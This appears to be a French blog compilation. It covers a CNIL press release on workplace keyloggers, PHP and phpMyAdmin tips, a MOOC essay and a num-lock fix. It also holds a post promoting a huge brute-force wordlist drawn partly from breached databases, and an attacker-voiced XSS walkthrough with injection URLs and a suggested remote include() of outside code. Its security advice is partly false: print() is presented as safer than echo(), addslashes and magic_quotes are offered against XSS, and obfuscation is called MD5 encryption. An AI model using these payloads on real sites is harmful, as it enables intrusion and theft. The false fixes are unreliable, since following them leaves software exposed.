communiqué de presse 20 mars 2013 de la CNIL - Keylogger : des dispositifs de cybersurveillance particulièrement intrusifs

Certaines sociétés sont parfois tentées d'utiliser des méthodes très intrusives afin de surveiller l'activité de leurs salariés depuis leur poste informatique. Cette surveillance peut par exemple s'opérer en utilisant des outils dénommés « keylogger ». Ces logiciels permettent d'enregistrer notamment toutes les frappes effectuées par un salarié sur son clavier. La CNIL rappelle que ce type d'outil ne peut pas être utilisé dans un contexte professionnel, à l'exception d'impératifs forts de sécurité, et d'une information spécifique des personnes concernées.

Les " keyloggers " sont des dispositifs de surveillance, parfois téléchargeables gratuitement depuis le web, qui se lancent automatiquement à chaque démarrage de la session de l'utilisateur, à son insu. Une fois lancés, ils permettent, selon les versions, d'enregistrer toutes les actions effectuées par les salariés sur leur poste informatique sans que ceux-ci s'en aperçoivent.

Toute frappe saisie sur le clavier ou tout écran consulté est enregistré avec un horodatage.

Des alertes peuvent être automatiquement envoyées à la personne ayant installé le dispositif lorsque le salarié ainsi surveillé saisit sur son clavier un mot prédéterminé. Selon son paramétrage, le dispositif permet également de générer des rapports, récapitulant l'ensemble des actions faites à partir d'un poste informatique, qui sont directement envoyés sur le poste informatique de celui qui aura installé le logiciel espion.

Un employeur peut fixer des conditions et des limites à l'utilisation des outils informatiques, notamment par un filtrage des sites non autorisés ou une interdiction de télécharger ou d'installer des logiciels. Mais la surveillance exercée sur les salariés ne doit pas porter une atteinte disproportionnée à leurs droits.

Or, ce type de logiciel conduit celui qui l'utilise à pouvoir exercer une surveillance constante et permanente sur l'activité professionnelle des salariés concernés mais aussi sur leur activité personnelle résiduelle effectuée à partir du poste informatique. Ainsi, les données enregistrées peuvent concerner aussi bien les courriels émis ou reçus, les conversations de messageries instantanées ou des informations personnelles sensibles telles qu'un numéro de carte bancaire ou les mots de passe des salariés lorsqu'ils accèdent, pendant leur temps de pause, à leur compte d'adresse électronique personnelle.

L'installation et l'utilisation d'un tel logiciel ne saurait se justifier en l'absence d'un fort impératif de sécurité (lutte contre la divulgation de secrets industriels, par exemple), accompagné d'une information spécifique des personnes concernées.

Depuis 2012, la CNIL a reçu plusieurs plaintes de salariés qui dénoncent l'installation, réelle ou supposée, sur leur poste informatique de dispositifs, du type " keylogger ".

Ces plaintes ont conduit la CNIL à effectuer des contrôles auprès des sociétés mises en cause afin de vérifier dans quelles conditions ces dispositifs très particuliers de cybersurveillance étaient utilisés.

Le contrôle de l'une de ces sociétés a permis de constater la mise en place effective d'un dispositif de ce type, à l'insu des salariés. La CNIL a estimé que ce dispositif portait une atteinte excessive à la vie privée des salariés concernés et qu'il était, dès lors, illicite au regard de la loi "informatique et libertés". Elle a donc  mis en demeure la société de cesser le traitement des données avec le logiciel en cause.

La CNIL précise, en outre, que la loi d'orientation et de programmation pour la performance de la sécurité intérieure du 14 mars 2011 punit dorénavant de 5 ans d'emprisonnement et de 300 000 € d'amende l'utilisation, mais aussi la vente, de certains dispositifs de captation de données informatiques à l'insu des personnes concernées.

La plus grande liste des mots de passe pour des attaques par force brute

Un grand merci pour @57un qui vient de nous fournir la plus grande collection des mots de passe. La liste contient les mots de passe des bases de données piratées, les mots qui se trouvent dans la base de données Wikipedia dans toutes les langues, tous les mots des dictionnaires, ainsi que des mots publiés dans de nombreux livres diffusés sur le site du projet Gutenberg. Ce qui nous fait un total de 1.493.677.780 mots.

Bien évidement, cette liste  sert à des attaques par force brute. On peut donc l’utiliser avec John The Ripper, un logiciel open source (et multiplateforme) de cassage de mots de passe.

On peut avoir cette liste à partir du torrent en fichier compressé de 4,2 GB (15 GB décompressé).  
source de l'article: blog 57un

Récupérer un mot de passe sur Firefox

    Firefox propose une fonctionnalité de mémorisation des mots de passe qui parait très utile en cas où l’internaute utilise des mots de passe différents pour s’authentifier aux applications web. A première vue, on croit que les mots de passe sont peut-être cryptés dans un fichier système puisque il n’a y pas un affichage clair au niveau du champ du saisie. Mais en faisant un tour dans les paramètres de Firefox, on peut facilement les avoir.

    Outils> options > onglet ‘sécurité’ et on clique sur le bouton ‘Mots de passe enregistrés…’ puis sur le bouton ‘afficher les mots de passe’. On aura les noms d’utilisateur ainsi que leurs mots de passe en clair pour chaque site enregistré sur le navigateur.

    Donc faites attention à cette fonctionnalité si vous utilisez un pc public. Elle reste pratique seulement pour un pc personnel.    

Sécuriser app web (php/MySQL) sur un serveur client

Le langage php est un langage interprété ou un langage de script (« langage de script » désigne, dans un sens vague, n'importe quel langage de programmation interprété). Un langage interprété est un langage qui n’est pas exécuté directement par la machine mais par un autre programme appelé interprète.

Le langage de script est généralement exécuté à partir de fichiers contenant le code source du programme qui sera interprété. Donc le code source des fichiers php est ouvert côté serveur. Ce qui n’est toujours pas tolérable si le client n’a pas payé le code source.

La manière la plus facile pour sécuriser le code est d’utiliser un obfuscateur php. Son principe est simple : crypter le code php  dans les scripts par des codages MD5 sur 8 caractères. Ce qui a pour effet de rendre le code complètement incompréhensible et par conséquent non modifiable. Il existe une dizaine de solutions gratuites en ligne et personnellement j’utilise FOPO : http://fopo.com.ar/index.php

Pour sécuriser l’accès au phpMyAdmin (l’interface de gestion MySQL) rien n’est plus simple : il faut d’abord ajouter un mot de passe à l’utilisateur root à travers l’interface utilisateurs> changer les privilèges> modifier mot de passe. Puis changer le type de l’authentification au serveur dans le fichier config.inc.php du phpmyadmin en http : $cfg['Servers'][$i]['auth_type'] = 'http';  Le type est par défaut ‘config’. On aura donc une authentification http pour l’accès à l’interface phpMyAdmin.  

Attaque de type XSS par echo()

echo en PHP permet l'affichage de texte. Elle n’est pas une fonction proprement dite puisque nous n’avons pas besoin d’utiliser des parenthèses lors de son appel.  

Le texte peut être représenté par une variable qui sera définie lors de l'appel de la page via une chaine de requête:
http://www.monsite.net/admin.php?page=2&titre=Presentation+monsite

La page2.php est incluse dans admin.php et il y aura probablement un appel du titre selon la forme : <?php echo $titre ?>

Cette page aura pour titre "Presentation monsite".

On change maintenant l'URL dans la barre d'adresse:
http://www.monsite.net/admin.php?page=2&titre=Votre+presentation

La page aura donc pour titre "Votre presentation".

On a pu nous-mêmes changer le titre de la page. Jusqu'au là rien n’est vraiment grave. On va essayer maintenant d’injecter du code. Pour vérifier si le développeur n’a pas pensé à sécuriser son code, on essayera avec cet url :   

http://www.monsite.net/admin.php?page=2&titre=<script>alert("Bonjour !")</script>

Si la page affiche une boite de dialogue "Bonjour !", c’est que nous pourrons nous régaler.
Si par contre, notre script apparait sur la page en titre, c'est foiré.

On n'a plus qu'à remplacer le titre par, par exemple, une fonction include() :
include("http://www.votresite.net/votrecode.php")

De cette façon, la page votrecode.php de votre site (votresite.net) apparaitra dans la page de la victime, à la place du titre. votrecode.php peut bien entendu contenir du code pour afficher une table de la base de données ou bloquer l’excusions la page elle-même.
Je traiterai plus en détails la commande include() dans un autre article.

On peut aussi utiliser la faille echo dans un moteur de recherche interne interne par le même principe. Si par exemple,  le site www.monsite.net propose un moteur de recherche interne pour ses produits, on peut tester la faille en entrant ce mot clé:
<script>alert("Bonjour !")</script>

Si on aura une phrase du type "Le produit recherché [<script>alert("Bonjour !")</script>] n'a pas été trouvé.", c'est que c'est foiré, le script est sécurisé. Si on aura notre boite de dialogue, on pourra  facilement injecter du code avec echo().

Donc en conclusion, pour sécuriser notre code il vaut mieux utiliser la fonction print() au lieu d’echo() :

<?php print htmlentities($titre) ?>.

Cette fonction transforme les caractères de la chaine en entités html, le code n'est donc plus interprété en tant que tel.
Bien entendu, il existe maintes solutions pour sécuriser cette faille, comme l'ajout de slashes à l'aide de addslashes() et personnellement j’utilise souvent cette méthode.

Vous pouvez également activer l'option MAGIC_QUOTES dans votre php.ini (MAGIC_QUOTES = on).

Qu’est-ce qu'un MOOC?

  Le débat concernant le MOOC - en Tunisie - est initié par monsieur Xavier Van Dieren de Belgique au forum de e-learning tenu à Tunis il y a un mois. Monsieur Xavier Van Dieren a introduit le concept  durant son intervention et il a abordé un peu plus du projet francophone ITyPA.

  La caractéristique essentielle d'un MOOC (Massive Open Online Course) tient en effet au mode de construction des connaissances que ce format de cours encourage : ces savoirs naissent principalement de l'interaction entre les participants. Il s'agit là d'une conception de l'apprentissage centrée sur l'apprenant. Ce qui signifie que ce dernier est le principal responsable de ses apprentissages; de leur quantité, de leur forme, de leur utilisation.

  L’approche classique de l'apprentissage, plus directive et plus centrée sur le formateur, est   la  plus répandue dans le monde académique. Et il serait risqué, pour l'avenir et la rénovation des modalités de la formation en ligne, de réduire les cours ouverts à tous, gratuits et accessibles via les outils numériques, à cette seule spécificité technique de production et de distribution. C’est justement ce que le MOOC cherche à résoudre.  Ce format tend à prendre de l'importance dans l'offre de cours en ligne. Du moins, un nombre grandissant de cours ouverts, gratuits et en ligne sont-ils qualifiés de MOOC.

  Comme tout environnement structuré d'apprentissage, le MOOC fournit à l'apprenant un facilitateur, de la documentation, une organisation temporelle, et des pairs. Mais l'essentiel est ailleurs. Le MOOC privilégie l'interconnexion systématique des participants entre eux d'une part, entre eux et d'autres personnes et ressources d'autre part. Cette interconnexion généralisée permet la collaboration ou au moins la discussion. Elle est d'autant plus fructueuse que chacune des personnes engagées produit elle-même de la ressource nouvelle.

  De cette collaboration naîtront les produits que les participants ont décidé de créer, seuls ou en groupe : des articles, des projets, de nouveaux cours...  Il n'y a pas de chemin unique dans un MOOC. Chaque participant trouvera le sien. Les ressources proposées et produites ne sont pas centralisées, elles sont distribuées en de multiples espaces numériques, repérables grâce à des signes conventionnels tels que des mots-clés, des hashtags... 

  Les ressources et la structure initiales d'un MOOC ne constituent donc qu'un point de départ, un espace de rassemblement ponctuel; l'essentiel se passe dans un espace beaucoup plus vaste, à géométrie variable, et sur un temps qui déborde largement celui de la distribution du cours lui-même. 

  Pour tirer le meilleur parti du MOOC il faut:

1. S'orienter dans les ressources et les espaces
2. S'exprimer sur des supports personnels, tels qu'un blogue ou  un compte Twitter...
3. Participer à un réseau et réagir aux publications des autres
4. Faire groupe avec un nombre restreint de participants selon les centres d'intérêt communs

Désormais je fais partie de la communauté francophone du MOOC  autour du projet ITyPA et je pense que le projet peut être une initiative intéressante pour une formation contenue des cadres.

  

Déactiver le clavier numérique

Mon ordinateur portable m'affiche des chiffres au lieu de lettres pour quelques touches du clavier (u=4 j=1 i=5 k=2 o=6 l=3 p=* m=- ,=0 :=. !=+ ...) et je suis obligée d'appuyer sur la touche Fonction (Fn) pour écrire normalement. 

J'ai activé par erreur le verrouillage numérique au lieu de cliquer sur l'imprime écran.

Pour y remédier il faut appuyer sur  la touche Verr.Num (c'est une touche semblable à imp ecr)

ou, selon les marques ou modèles de portable le mode opératoire et noms des touches peuvent être différents, appuyez sur les combinaisons :

• Fn + Verr.Num
• Shift + Verr.Num
• Maj + Num Défil (sur IBM Thinkpad)